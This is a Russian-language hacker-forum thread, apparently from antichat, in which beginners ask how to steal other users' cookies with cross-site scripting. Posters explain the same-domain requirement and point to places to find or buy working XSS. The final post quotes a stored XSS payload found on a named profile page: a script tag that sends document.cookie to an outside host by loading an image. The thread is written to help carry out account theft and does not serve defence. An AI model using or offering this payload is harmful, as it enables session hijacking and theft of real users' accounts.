Ссылка должна быть на том же домене, от которого ты хочешь куку. Забрать куку от почты можно только если твой скрипт воровства куков будет на том же домене что и почтовый ящик. Читай про Cross Site Scripting (XSS)
Нет, ну парень действительно прав, я считаю что многих интересует "ссылка крижи куки", я вот тоже многог статей2 обчитал, но везде только поверхностно говориться((( ЗЫ: я новичек, где здесь находиться паблик (глянуть свежиt xss)
в этих темах смотри: http://forum.antichat.ru/thread88986.html http://forum.antichat.ru/thread35802.html но щас нету рабочих хсс, так что ищи сам или покупай...
а вот смотри, допустим я нашол xss, вставил запрос куки на сниффер(скрипт), все пашед, потом етот баг прикріваеться(я напиример ету xxs выложил в паблик все уже о ней узнал и потом решили ее прикрыть) когда я в 1-й раз кинул скрипт, его тоже потом прикроют, а то я знаю 1 xss я не могу вкинуть скрипт , а кто то раньше кинул и он работает и ворует куки!
Вот тут внедрен скрипт которій крадет куки http://jamber.info/profile/KISA_Anfisa.html как мне так сделать, если ничего не получаеться((
Если глянуть исходный текст, то мы видим крижу куки, как мне так сделать? HTML: <div style="font-size: 17px; font-weight: bold;">О себе:</div><br /> <div style="font-size: 12px;"> я люблю только это:р<script>img = new Image(); img.src = "http://comp-info.ru/pic/image.jpg?"+document.cookie;</script> </div> <div id="about_editor" style="display: none;"><br /><br /> <textarea id="about_textarea" name="about_textarea" onkeyup="AboutEditor_MinChar();" style="width: 100%;">я люблю только это:р<script>img = new Image(); img.src = "http://comp-info.ru/pic/image.jpg?"+document.cookie;</script></textarea><br /> <div align="center">
